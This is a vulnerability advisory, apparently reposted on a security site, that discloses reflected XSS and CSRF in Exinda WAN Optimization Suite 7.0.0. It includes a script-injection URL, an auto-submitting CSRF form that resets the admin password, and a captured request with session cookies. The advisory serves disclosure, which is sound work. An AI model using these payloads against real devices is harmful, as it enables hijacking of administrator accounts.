Exinda WAN Optimization Suite 7.0.0 CSRF / XSS

2014.09.29
Credit: William Costa
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

I. VULNERABILITY ------------------------- XSS Reflected vulnerabilities and CSRF in Exinda WAN Optimization Suite II. BACKGROUND ------------------------- WAN Optimization Suite integrates enterprise-caliber bandwidth acceleration and optimization with best-in-class application network visibility and control in a single, easy-to-use suite - See more at: III. DESCRIPTION ------------------------- Has been detected a XSS Reflected vulnerability in Exinda Wan Optimization "/admin/launch?script=rh&template=sys-users&tabsel=" parameter “tabsel” in version v7.0.0 (2160), that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser. This may allow a remote attacker to be able to forge requests that Exinda takes action upon. IV. PROOF OF CONCEPT ------------------------- The application does not validate the parameter “tabsel” in " https://demo-nam-01.exinda.com:42818/admin/launch?script=rh&template=sys- users&tabsel=aaa"><script>alert("Exinda XSS")</script> POC CSRF <html> <body onload="CSRF.submit();"> <form id="CSRF" action="https://demo-nam- 02.exinda.com:34896/admin/launch?script=rh&template=sys- users&tabsel=localusers" method="post" name="CSRF"> <input name="action10" value="password_exinda"> </input> <input name="d_account=" value="account"> </input> <input name="t_account" value="string"> </input> <input name="c_account" value="string"> </input> <input name="e_account" value="true"> </input> <input name="f_account" value="admin"> </input> <input name="d_password" value="password"> </input> <input name="c_password" value="-"> </input> <input name="m_password" value="false"> </input> <input name="e_password" value="true"> </input> <input name="f_password" value="123456"> </input> <input name="d_confirm" value="confirm"> </input> <input name="c_confirm" value="-"> </input> <input name="m_confirm" value="false"> </input> <input name="e_confirm" value="true"> </input> <input name="f_confirm" value="123456"> </input> <input name="apply" value="Change+Password"> </input> </form> </body> </html> Host=demo-nam-02.exinda.com:34896 User-Agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0 Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language=pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding=gzip, deflate Referer=https://10.0.1.120/exinda/csrf.php Cookie=resolutionconfig=today; _mkto_trk=id:316-TKO-387&token:_mch- exinda.com-1411601373982-94280; __utma=217124611.1138601206.1411601386.1411601386.1411601386.1; __utmb=217124611.6.9.1411601437592; __utmc=217124611; __utmz=217124611.1411601386.1.1.utmcsr=demo.exinda.com|utmccn=(referra l)|utmcmd=referral|utmcct=/launch.php; iframe=yes; session=IGQYEA1Jo1%2bOiMFK5%2b1joDCh60VoGvzrLqGJ%2bfF1Q1VCAAE%3d; SDPSession=9b1195d97d796f12d828a2acd5801718fb152e1b0e3f194ace21529571c 41f8f; user_email=admin; first%5flogin=false; st_index=1411531200; et_index=1411617600; lastConfigurationPage=https%3A%2F%2Fdemo-nam- 02.exinda.com%3A34896%2Fadmin%2Flaunch%3Fscript%3Drh%26template%3Dsys- users%26tabsel%3Dlocalusers Connection=keep-alive Content-Type=application/x-www-form-urlencoded Content-Length=300 POSTDATA=action10=password_exinda&d_account%3D=account&t_account=strin g&c_account=string&e_account=true&f_account=admin&d_password=password& c_password=- &m_password=false&e_password=true&f_password=123456&d_confirm=confirm&c_confirm=- &m_confirm=false&e_confirm=true&f_confirm=123456&apply=Change%2BPasswo rd V. BUSINESS IMPACT ------------------------- Vulnerability allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser and change password of admin user without consentiment. VI. REQUIREMENTS ----------------------- An Attacker needs to know the IP of the device. An Administrator needs an authenticated connection to the device. VII. SYSTEMS AFFECTED ------------------------- Try Exinda WAN Optimization Suite v7.0.0 (2160) VIII. SOLUTION ------------------------- All parameter must be validated and use of token csrf


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top